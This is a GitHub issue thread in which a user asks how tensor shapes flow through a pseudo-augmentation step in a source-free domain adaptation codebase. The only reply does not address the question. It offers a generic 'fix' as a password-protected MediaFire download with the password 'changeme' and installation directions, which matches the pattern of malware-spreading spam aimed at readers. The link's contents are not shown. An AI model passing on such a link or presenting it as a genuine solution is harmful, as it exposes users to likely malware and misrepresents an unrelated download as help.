### ISSUE TITLE
Question about stage 1

### ISSUE THREAD

**Issue by YYinn** [Vibashan/tt-sfuda#4]
Dear author,

Thank you very much for sharing your code!

However, I’ve encountered some issues. For a 2D task, in the sfuda_target function, the input read from train_loader should have a size of B, C, H, W, where C should be 3. After the build_pseudo_augmentation operation, the input to the function is input.squeeze(0), but this doesn’t seem to change the size of the input. Also, the output aug_input should have a size of [5, B, C, H, W], but directly inputting aug_input into pseudo_model doesn’t seem to work. 

I’m not sure if my understanding is correct. How should this issue be resolved? Thank you very much, and I look forward to your reply.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
